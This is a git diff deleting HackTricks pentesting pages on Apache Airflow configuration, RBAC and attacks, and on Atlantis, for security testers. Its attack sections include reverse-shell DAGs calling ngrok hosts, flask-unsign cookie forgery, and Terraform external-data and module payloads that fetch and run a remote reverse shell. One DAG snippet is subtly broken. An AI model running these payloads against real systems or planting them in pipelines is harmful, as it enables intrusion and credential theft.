+* [Pentesting Cloud (AWS, GCP, Az...)](https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology)
+* [Pentesting CI/CD (Github, Jenkins, Terraform...)](https://cloud.hacktricks.xyz/pentesting-ci-cd/pentesting-ci-cd-methodology)
## 🔩 Hardware/Physical Access
diff --git a/cloud-security/apache-airflow/README.md b/cloud-security/apache-airflow/README.md
deleted file mode 100644
index a8e93193d..000000000
--- a/cloud-security/apache-airflow/README.md
+++ /dev/null
@@ -1,175 +0,0 @@
-
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-
-# Basic Information
-
-[**Apache Airflow**](https://airflow.apache.org) is used for the **scheduling and orchestration of data pipelines or workflows**. Orchestration of data pipelines refers to sequencing, coordinating, scheduling, and managing complex **data pipelines from diverse sources**. These pipelines deliver data sets that are ready for consumption by business intelligence applications or by data science and machine learning models that support big data applications.
-
-Basically, Apache Airflow allows you to **schedule the execution of code when something** (an event, a cron schedule) **happens**.
-
-# Local Lab
-
-## Docker-Compose
-
-You can use the **docker-compose config file from** [**https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml**](https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml) to launch a complete Apache Airflow Docker environment. (If you are on macOS, make sure to give at least 6GB of RAM to the Docker VM.)
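-
-A minimal sketch of launching it (the official docs also run an `airflow-init` step before bringing the stack up):
-
-```bash
-# Download the official docker-compose file and start the whole stack in the background
-curl -LfO https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml
-docker compose up airflow-init
-docker compose up -d
-```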
-
-## Minikube
-
-One easy way to **run Apache Airflow** is to run it **with minikube**:
-
-```bash
-helm repo add airflow-stable https://airflow-helm.github.io/charts
-helm repo update
-helm install airflow-release airflow-stable/airflow
-# Some information about how to access the web console will appear after this command
-
-# Use this command to delete it
-helm delete airflow-release
-```
-
-# Airflow Configuration
-
-Airflow might store **sensitive information** in its configuration or you can find weak configurations in place:
-
-{% content-ref url="airflow-configuration.md" %}
-[airflow-configuration.md](airflow-configuration.md)
-{% endcontent-ref %}
-
-# Airflow RBAC
-
-Before starting to attack Airflow you should understand **how permissions work**:
-
-{% content-ref url="airflow-rbac.md" %}
-[airflow-rbac.md](airflow-rbac.md)
-{% endcontent-ref %}
-
-# Attacks
-
-## Web Console Enumeration
-
-If you have **access to the web console** you might be able to access some or all of the following information:
-
-* **Variables** (Custom sensitive information might be stored here)
-* **Connections** (Custom sensitive information might be stored here)
-* [**Configuration**](./#airflow-configuration) (Sensitive information like the **`secret_key`** and passwords might be stored here)
-* List **users & roles**
-* **Code of each DAG** (which might contain interesting info)
-
-## Privilege Escalation
-
-If the **`expose_config`** configuration is set to **True**, users with the **role User** and **upwards** can **read** the **config in the web console**. This config contains the **`secret_key`**, which means that any user who obtains it can **create their own signed cookie to impersonate any other user account**.
-
-```bash
-flask-unsign --sign --secret '' --cookie "{'_fresh': True, '_id': '12345581593cf26619776d0a1e430c412171f4d12a58d30bef3b2dd379fc8b3715f2bd526eb00497fcad5e270370d269289b65720f5b30a39e5598dad6412345', '_permanent': True, 'csrf_token': '09dd9e7212e6874b104aad957bbf8072616b8fbc', 'dag_status_filter': 'all', 'locale': 'en', 'user_id': '1'}"
-```
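-
-The output of `flask-unsign` is a forged session cookie. A minimal usage sketch, assuming a hypothetical host and that the web UI stores the session in a cookie named `session`:
-
-```bash
-# Hypothetical target; browse the console as the impersonated user (user_id 1 above)
-curl -s --cookie "session=<signed-cookie-from-flask-unsign>" http://airflow.example.com:8080/home
-```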
-
-## DAG Backdoor (RCE in Airflow worker)
-
-If you have **write access** to the place where the **DAGs are saved**, you can just **create one** that will send you a **reverse shell.**\
-Note that this reverse shell is going to be executed inside an **airflow worker container**:
-
-```python
-import pendulum
-from airflow import DAG
-from airflow.operators.bash import BashOperator
-
-with DAG(
- dag_id='rev_shell_bash',
- schedule_interval='0 0 * * *',
- start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
-) as dag:
- run = BashOperator(
- task_id='run',
- bash_command='bash -i >& /dev/tcp/8.tcp.ngrok.io/11433 0>&1',
- )
-```
-
-```python
-import pendulum, socket, os, pty
-from airflow import DAG
-from airflow.operators.python import PythonOperator
-
-def rs(rhost, port):
- s = socket.socket()
- s.connect((rhost, port))
- [os.dup2(s.fileno(),fd) for fd in (0,1,2)]
- pty.spawn("/bin/sh")
-
-with DAG(
- dag_id='rev_shell_python',
- schedule_interval='0 0 * * *',
- start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
-) as dag:
- run = PythonOperator(
- task_id='rs_python',
- python_callable=rs,
- op_kwargs={"rhost":"8.tcp.ngrok.io", "port": 11433}
- )
-```
-
-## DAG Backdoor (RCE in Airflow scheduler)
-
-If you set something to be **executed in the root of the code**, at the time of this writing it will be **executed by the scheduler** a couple of seconds after you place it inside the DAGs folder.
-
-```python
-import pendulum, socket, os, pty
-from airflow import DAG
-from airflow.operators.python import PythonOperator
-
-def rs(rhost, port):
- s = socket.socket()
- s.connect((rhost, port))
- [os.dup2(s.fileno(),fd) for fd in (0,1,2)]
- pty.spawn("/bin/sh")
-
-rs("2.tcp.ngrok.io", 14403)
-
-with DAG(
- dag_id='rev_shell_python2',
- schedule_interval='0 0 * * *',
- start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
-) as dag:
- run = PythonOperator(
- task_id='rs_python2',
- python_callable=rs,
- op_kwargs={"rhost":"2.tcp.ngrok.io", "port": 144}
-```
-
-## DAG Creation
-
-If you manage to **compromise a machine inside the DAG cluster**, you can create new **DAG scripts** in the `dags/` folder and they will be **replicated to the rest of the machines** inside the DAG cluster.
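-
-A minimal sketch, assuming a hypothetical DAG folder path (it varies per deployment; check `dags_folder` in `airflow.cfg`):
-
-```bash
-# Drop a malicious DAG where the scheduler/workers will pick it up and replicate it
-cp /tmp/rev_shell_python.py /opt/airflow/dags/
-```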
-
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-
diff --git a/cloud-security/apache-airflow/airflow-configuration.md b/cloud-security/apache-airflow/airflow-configuration.md
deleted file mode 100644
index ae4e65f9e..000000000
--- a/cloud-security/apache-airflow/airflow-configuration.md
+++ /dev/null
@@ -1,143 +0,0 @@
-
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-
-# Configuration File
-
-**Apache Airflow** generates a **config file** on all the Airflow machines, called **`airflow.cfg`**, in the home directory of the airflow user. This config file contains configuration information and **might contain interesting and sensitive information.**
-
-**There are two ways to access this file: by compromising some Airflow machine, or by accessing the web console.**
-
-Note that the **values inside the config file** **might not be the ones used**, as you can override them by setting env variables such as `AIRFLOW__WEBSERVER__EXPOSE_CONFIG: 'true'` (see the example below).
-
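-A quick sketch of the override convention (`AIRFLOW__<SECTION>__<KEY>`), using placeholder values:
-
-```bash
-# Environment variables take precedence over the values written in airflow.cfg
-export AIRFLOW__WEBSERVER__EXPOSE_CONFIG=true
-export AIRFLOW__CORE__FERNET_KEY='<fernet-key>'  # placeholder
-```
-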
-If you have access to the **config file in the web server**, you can check the **real running configuration** on the same page where the config is displayed.\
-If you have **access to some machine inside the Airflow env**, check the **environment**.
-
-Some interesting values to check when reading the config file:
-
-## \[api]
-
-* **`access_control_allow_headers`**: This indicates the **allowed** **headers** for **CORS**
-* **`access_control_allow_methods`**: This indicates the **allowed methods** for **CORS**
-* **`access_control_allow_origins`**: This indicates the **allowed origins** for **CORS**
-* **`auth_backend`**: [**According to the docs**](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html) a few options can be in place to configure who can access the API (see the example after this list):
- * `airflow.api.auth.backend.deny_all`: **By default nobody** can access the API
- * `airflow.api.auth.backend.default`: **Everyone can** access it without authentication
- * `airflow.api.auth.backend.kerberos_auth`: To configure **kerberos authentication**
- * `airflow.api.auth.backend.basic_auth`: For **basic authentication**
- * `airflow.composer.api.backend.composer_auth`: Uses Composer's authentication (GCP) (from [**here**](https://cloud.google.com/composer/docs/access-airflow-api)).
- * `composer_auth_user_registration_role`: This indicates the **role** the **composer user** will get inside **airflow** (**Op** by default).
- * You can also **create your own authentication** method with Python.
-* **`google_key_path`:** Path to the **GCP service account key**
-
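-For instance, if `auth_backend` is set to `basic_auth`, the stable REST API can be queried directly (hypothetical host and credentials):
-
-```bash
-# List DAGs through the stable REST API using basic auth
-curl -s -u admin:admin http://airflow.example.com:8080/api/v1/dags
-```
-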
-## **\[atlas]**
-
-* **`password`**: Atlas password
-* **`username`**: Atlas username
-
-## \[celery]
-
-* **`flower_basic_auth`**: Credentials (_user1:password1,user2:password2_)
-* **`result_backend`**: Postgres url which may contain **credentials**.
-* **`ssl_cacert`**: Path to the cacert
-* **`ssl_cert`**: Path to the cert
-* **`ssl_key`**: Path to the key
-
-## \[core]
-
-* **`dag_discovery_safe_mode`**: Enabled by default. When discovering DAGs, ignore any files that don't contain the strings `DAG` and `airflow`.
-* **`fernet_key`**: Symmetric key used to store encrypted variables (see the decryption sketch after this list)
-* **`hide_sensitive_var_conn_fields`**: Enabled by default, hide sensitive info of connections.
-* **`security`**: What security module to use (for example kerberos)
-
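-As a sketch, a leaked `fernet_key` can be used to decrypt encrypted connection/variable values pulled from the metadata database (the key and ciphertext below are placeholders):
-
-```bash
-# Decrypt a value encrypted by Airflow with the leaked fernet_key
-python3 -c "from cryptography.fernet import Fernet; print(Fernet(b'<fernet_key>').decrypt(b'<ciphertext-from-db>'))"
-```
-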
-## \[dask]
-
-* **`tls_ca`**: Path to the CA
-* **`tls_cert`**: Path to the cert
-* **`tls_key`**: Path to the TLS key
-
-## \[kerberos]
-
-* **`ccache`**: Path to ccache file
-* **`forwardable`**: Enabled by default
-
-## \[logging]
-
-* **`google_key_path`**: Path to GCP JSON creds.
-
-## \[secrets]
-
-* **`backend`**: Full class name of secrets backend to enable
-* **`backend_kwargs`**: The backend\_kwargs param is loaded into a dictionary and passed to the **init** of the secrets backend class.
-
-## \[smtp]
-
-* **`smtp_password`**: SMTP password
-* **`smtp_user`**: SMTP user
-
-## \[webserver]
-
-* **`cookie_samesite`**: By default it's **Lax**, so it's already the weakest possible value
-* **`cookie_secure`**: Set the **secure flag** on the session cookie
-* **`expose_config`**: By default it's False; if True, the **config** can be **read** from the web **console**
-* **`expose_stacktrace`**: By default it's True; it will show **Python tracebacks** (potentially useful for an attacker)
-* **`secret_key`**: This is the **key used by flask to sign the cookies** (if you have this you can **impersonate any user in Airflow**)
-* **`web_server_ssl_cert`**: **Path** to the **SSL** **cert**
-* **`web_server_ssl_key`**: **Path** to the **SSL** **Key**
-* **`x_frame_enabled`**: Default is **True**, so by default clickjacking isn't possible
-
-## Web Authentication
-
-By default **web authentication** is specified in the file **`webserver_config.py`** and is configured as
-
-```bash
-AUTH_TYPE = AUTH_DB
-```
-
-Which means that the **authentication is checked against the database**. However, other configurations are possible like
-
-```bash
-AUTH_TYPE = AUTH_OAUTH
-```
-
-to leave the **authentication to third-party services**.
-
-However, there is also an option to **allow anonymous users access** by setting the following parameter to the **desired role**:
-
-```bash
-AUTH_ROLE_PUBLIC = 'Admin'
-```
-
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-
diff --git a/cloud-security/apache-airflow/airflow-rbac.md b/cloud-security/apache-airflow/airflow-rbac.md
deleted file mode 100644
index 575288e30..000000000
--- a/cloud-security/apache-airflow/airflow-rbac.md
+++ /dev/null
@@ -1,75 +0,0 @@
-
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-
-# RBAC
-
-Airflow ships with a **set of roles by default**: **Admin**, **User**, **Op**, **Viewer**, and **Public**. **Only `Admin`** users can **configure/alter the permissions of other roles**, but it is not recommended that `Admin` users alter these default roles in any way by removing or adding permissions to them.
-
-* **`Admin`** users have all possible permissions.
-* **`Public`** users (anonymous) donβt have any permissions.
-* **`Viewer`** users have limited viewer permissions (read only). They **cannot see the config.**
-* **`User`** users have `Viewer` permissions plus additional user permissions that allow them to manage DAGs to some extent. They **can see the config file**.
-* **`Op`** users have `User` permissions plus additional op permissions.
-
-Note that **admin** users can **create more roles** with more **granular permissions**.
-
-Also note that the only default role with **permission to list users and roles is Admin; not even Op** is able to do that.
-
-## Default Permissions
-
-These are the default permissions per default role:
-
-* **Admin**
-
-\[can delete on Connections, can read on Connections, can edit on Connections, can create on Connections, can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can delete on Pools, can read on Pools, can edit on Pools, can create on Pools, can read on Providers, can delete on Variables, can read on Variables, can edit on Variables, can create on Variables, can read on XComs, can read on DAG Code, can read on Configurations, can read on Plugins, can read on Roles, can read on Permissions, can delete on Roles, can edit on Roles, can create on Roles, can read on Users, can create on Users, can edit on Users, can delete on Users, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances, menu access on Admin, menu access on Configurations, menu access on Connections, menu access on Pools, menu access on Variables, menu access on XComs, can delete on XComs, can read on Task Reschedules, menu access on Task Reschedules, can read on Triggers, menu access on Triggers, can read on Passwords, can edit on Passwords, menu access on List Users, menu access on Security, menu access on List Roles, can read on User Stats Chart, menu access on User's Statistics, menu access on Base Permissions, can read on View Menus, menu access on Views/Menus, can read on Permission Views, menu access on Permission on Views/Menus, can get on MenuApi, menu access on Providers, can create on XComs]
-
-* **Op**
-
-\[can delete on Connections, can read on Connections, can edit on Connections, can create on Connections, can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can delete on Pools, can read on Pools, can edit on Pools, can create on Pools, can read on Providers, can delete on Variables, can read on Variables, can edit on Variables, can create on Variables, can read on XComs, can read on DAG Code, can read on Configurations, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances, menu access on Admin, menu access on Configurations, menu access on Connections, menu access on Pools, menu access on Variables, menu access on XComs, can delete on XComs]
-
-* **User**
-
-\[can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can read on XComs, can read on DAG Code, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances]
-
-* **Viewer**
-
-\[can read on DAGs, can read on DAG Runs, can read on Task Instances, can read on Audit Logs, can read on ImportError, can read on XComs, can read on DAG Code, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances]
-
-* **Public**
-
-\[]
-
-
-
-
-
-
-
-
diff --git a/cloud-security/atlantis.md b/cloud-security/atlantis.md
deleted file mode 100644
index c92ece0ad..000000000
--- a/cloud-security/atlantis.md
+++ /dev/null
@@ -1,394 +0,0 @@
-# Atlantis
-
-
-
-
-
-
-
-## Basic Information
-
-Atlantis basically helps you run Terraform from Pull Requests on your git server.
-
-![](<../.gitbook/assets/image (307) (3).png>)
-
-## Local Lab
-
-1. Go to the **atlantis releases page** in [https://github.com/runatlantis/atlantis/releases](https://github.com/runatlantis/atlantis/releases) and **download** the one that suits you.
-2. Create a **personal token** (with repo access) of your **github** user
-3. Execute `./atlantis testdrive` and it will create a **demo repo** you can use to **talk to atlantis**
- 1. You can access the web page at 127.0.0.1:4141
-
-## Atlantis Access
-
-### Git Server Credentials
-
-**Atlantis** supports several git hosts such as **Github**, **Gitlab**, **Bitbucket** and **Azure DevOps**.\
-However, in order to access the repos in those platforms and perform actions, it needs to be granted some **privileged access** (at least write permissions).\
-[**The docs**](https://www.runatlantis.io/docs/access-credentials.html#create-an-atlantis-user-optional) encourage creating a user on these platforms specifically for Atlantis, but some people might use personal accounts.
-
-{% hint style="warning" %}
-In any case, from an attacker's perspective, the **Atlantis account** is going to be a very **interesting one to compromise**.
-{% endhint %}
-
-### Webhooks
-
-Atlantis optionally uses [**Webhook secrets**](https://www.runatlantis.io/docs/webhook-secrets.html#generating-a-webhook-secret) to validate that the **webhooks** it receives from your Git host are **legitimate**.
-
-One way to confirm this would be to **allowlist requests to only come from the IPs** of your Git host but an easier way is to use a Webhook Secret.
-
-Note that unless you use a private GitHub or Bitbucket server, you will need to expose webhook endpoints to the Internet.
-
-{% hint style="warning" %}
-Atlantis is going to be **exposing webhooks** so the git server can send it information. From an attacker's perspective it would be interesting to know **if you can send it messages**.
-{% endhint %}
-
-### Provider Credentials
-
-Atlantis runs Terraform by simply **executing `terraform plan` and `apply`** commands on the server **Atlantis is hosted on**. Just like when you run Terraform locally, Atlantis needs credentials for your specific provider.
-
-It's up to you how you [provide credentials](https://www.runatlantis.io/docs/provider-credentials.html#aws-specific-info) for your specific provider to Atlantis:
-
-* The Atlantis [Helm Chart](https://www.runatlantis.io/docs/deployment.html#kubernetes-helm-chart) and [AWS Fargate Module](https://www.runatlantis.io/docs/deployment.html#aws-fargate) have their own mechanisms for provider credentials. Read their docs.
-* If you're running Atlantis in a cloud then many clouds have ways to give cloud API access to applications running on them, ex:
- * [AWS EC2 Roles](https://registry.terraform.io/providers/hashicorp/aws/latest/docs) (Search for "EC2 Role")
- * [GCE Instance Service Accounts](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider\_reference)
-* Many users set environment variables, ex. `AWS_ACCESS_KEY`, where Atlantis is running.
-* Others create the necessary config files, ex. `~/.aws/credentials`, where Atlantis is running.
-* Use the [HashiCorp Vault Provider](https://registry.terraform.io/providers/hashicorp/vault/latest/docs) to obtain provider credentials.
-
-{% hint style="warning" %}
-The **container** where **Atlantis** is **running** will very likely **contain privileged credentials** to the providers (AWS, GCP, Github...) that Atlantis is managing via Terraform.
-{% endhint %}
-
-### Web Page
-
-By default Atlantis runs a **web page on port 4141 on localhost**. This page just allows you to enable/disable atlantis apply, check the plan status of the repos and unlock them (it doesn't allow you to modify things, so it isn't that useful).
-
-You probably won't find it exposed to the internet, but it looks like by default **no credentials are needed** to access it (and if they are, `atlantis`:`atlantis` are the **default** ones).
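-
-For example, a quick way to probe it from an attacker's perspective (host and port are assumptions, adjust them to the target):
-
-```bash
-# By default the UI listens on 4141 without authentication
-curl -s http://atlantis.example.com:4141/ | grep -i atlantis
-
-# If BasicAuth was enabled, try the default credentials
-curl -s -u atlantis:atlantis http://atlantis.example.com:4141/
-```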
-
-## Server Configuration
-
-Configuration to `atlantis server` can be specified via command line flags, environment variables, a config file or a mix of the three.
-
-* You can find [**here the list of flags**](https://www.runatlantis.io/docs/server-configuration.html#server-configuration) supported by Atlantis server
-* You can find [**here how to transform a config option into an env var**](https://www.runatlantis.io/docs/server-configuration.html#environment-variables)
-
-Values are **chosen in this order**:
-
-1. Flags
-2. Environment Variables
-3. Config File
-
-{% hint style="warning" %}
-Note that in the configuration you might find interesting values such as **tokens and passwords**.
-{% endhint %}
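-
-A sketch of the three mechanisms for the same option (the token value is a placeholder; per the docs, the env var name is the flag name uppercased, with dashes turned into underscores and an `ATLANTIS_` prefix):
-
-```bash
-# 1. Flag (highest precedence)
-atlantis server --gh-user atlantis-bot --gh-token "$TOKEN"
-
-# 2. Environment variable
-export ATLANTIS_GH_TOKEN="$TOKEN"
-
-# 3. Config file (lowest precedence)
-cat > /etc/atlantis.yaml <<'EOF'
-gh-user: atlantis-bot
-gh-token: xxxxxxxx
-EOF
-atlantis server --config /etc/atlantis.yaml
-```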
-
-### Repos Configuration
-
-Some configurations affect **how the repos are managed**. However, each repo may **require different settings**, so there are ways to configure them per repo. This is the priority order:
-
-1. Repo [**`/atlantis.yml`**](https://www.runatlantis.io/docs/repo-level-atlantis-yaml.html#repo-level-atlantis-yaml-config) file. This file can be used to specify how atlantis should treat the repo. However, by default some keys cannot be specified here without some flags allowing it.
- 1. Probably required to be allowed by flags like `allowed_overrides` or `allow_custom_workflows`
-2. [**Server Side Config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config): You can pass it with the flag `--repo-config`; it's a YAML file configuring new settings for each repo (regexes supported)
-3. **Default** values
-
-**PR Protections**
-
-Atlantis allows you to indicate if you want the **PR** to be **`approved`** by somebody else (even if that isn't set in the branch protection) and/or be **`mergeable`** (branch protections passed) **before running apply**. From a security point of view, setting both options is recommended.
-
-In case `allowed_overrides` is True, these settings can be **overwritten on each project by the `/atlantis.yml` file**.
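-
-A minimal server-side config sketch enforcing both protections and disallowing repo-level overrides (the file name is an assumption):
-
-```bash
-cat > repos.yaml <<'EOF'
-repos:
-- id: /.*/                                # applies to every repo
-  apply_requirements: [approved, mergeable]
-  allowed_overrides: []                   # nothing can be overridden from /atlantis.yml
-  allow_custom_workflows: false
-EOF
-atlantis server --repo-config repos.yaml  # plus the rest of your flags
-```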
-
-**Scripts**
-
-The repo config can **specify scripts** to run [**before**](https://www.runatlantis.io/docs/pre-workflow-hooks.html#usage) (_pre workflow hooks_) and [**after**](https://www.runatlantis.io/docs/post-workflow-hooks.html) (_post workflow hooks_) a **workflow is executed.**
-
-There isn't any option to allow **specifying** these scripts in the **repo `/atlantis.yml`** file.
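-
-A minimal server-side sketch (the hook scripts are hypothetical):
-
-```bash
-cat > repos.yaml <<'EOF'
-repos:
-- id: /.*/
-  pre_workflow_hooks:
-    - run: ./scripts/lint-terraform.sh    # hypothetical script run before the workflow
-  post_workflow_hooks:
-    - run: ./scripts/notify-slack.sh      # hypothetical script run after the workflow
-EOF
-```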
-
-**Workflow**
-
-In the repo config (server side config) you can [**specify a new default workflow**](https://www.runatlantis.io/docs/server-side-repo-config.html#change-the-default-atlantis-workflow), or [**create new custom workflows**](https://www.runatlantis.io/docs/custom-workflows.html#custom-workflows)**.** You can also **specify** which **repos** can **access** the **new** ones generated.\
-Then, you can allow the **atlantis.yaml** file of each repo to **specify the workflow to use.**
-
-{% hint style="danger" %}
-If the flag `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo.\
-This will basically give **RCE in the Atlantis server to any user that can access that repo**.
-
-```yaml
-# atlantis.yaml
-version: 3
-projects:
-- dir: .
- workflow: custom1
-workflows:
- custom1:
- plan:
- steps:
- - init
- - run: my custom plan command
- apply:
- steps:
- - run: my custom apply command
-```
-{% endhint %}
-
-**Conftest Policy Checking**
-
-Atlantis supports running **server-side** [**conftest**](https://www.conftest.dev) **policies** against the plan output. Common use cases include:
-
-* Denying usage of a list of modules
-* Asserting attributes of a resource at creation time
-* Catching unintentional resource deletions
-* Preventing security risks (ie. exposing secure ports to the public)
-
-You can check how to configure it in [**the docs**](https://www.runatlantis.io/docs/policy-checking.html#how-it-works).
-
-## Atlantis Commands
-
-[**In the docs**](https://www.runatlantis.io/docs/using-atlantis.html#using-atlantis) you can find the options you can use to run Atlantis:
-
-```bash
-# Get help
-atlantis help
-
-# Run terraform plan
-atlantis plan [options] -- [terraform plan flags]
-#Options:
-# -d directory
-# -p project
-# --verbose
-# You can also add extra terraform options
-
-# Run terraform apply
-atlantis apply [options] -- [terraform apply flags]
-#Options:
-# -d directory
-# -p project
-# -w workspace
-# --auto-merge-disabled
-# --verbose
-# You can also add extra terraform options
-```
-
-## Attacks
-
-{% hint style="warning" %}
-If during the exploitation you find this **error**: `Error: Error acquiring the state lock`
-
-You can fix it by running:
-
-```
-atlantis unlock #You might need to run this in a different PR
-atlantis plan -- -lock=false
-```
-{% endhint %}
-
-### Atlantis plan RCE - Config modification in new PR
-
-If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can **execute `atlantis plan`** (or maybe it's automatically executed) **you will be able to RCE inside the Atlantis server**.
-
-You can do this by making [**Atlantis load an external data source**](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data\_source). Just put a payload like the following in the `main.tf` file:
-
-```json
-data "external" "example" {
- program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"]
-}
-```
-
-**Stealthier Attack**
-
-You can perform this attack even in a **stealthier way**, by following these suggestions:
-
-* Instead of adding the rev shell directly into the terraform file, you can **load an external resource** that contains the rev shell:
-
-```javascript
-module "not_rev_shell" {
- source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules"
-}
-```
-
-You can find the rev shell code in [https://github.com/carlospolop/terraform\_external\_module\_rev\_shell/tree/main/modules](https://github.com/carlospolop/terraform\_external\_module\_rev\_shell/tree/main/modules)
-
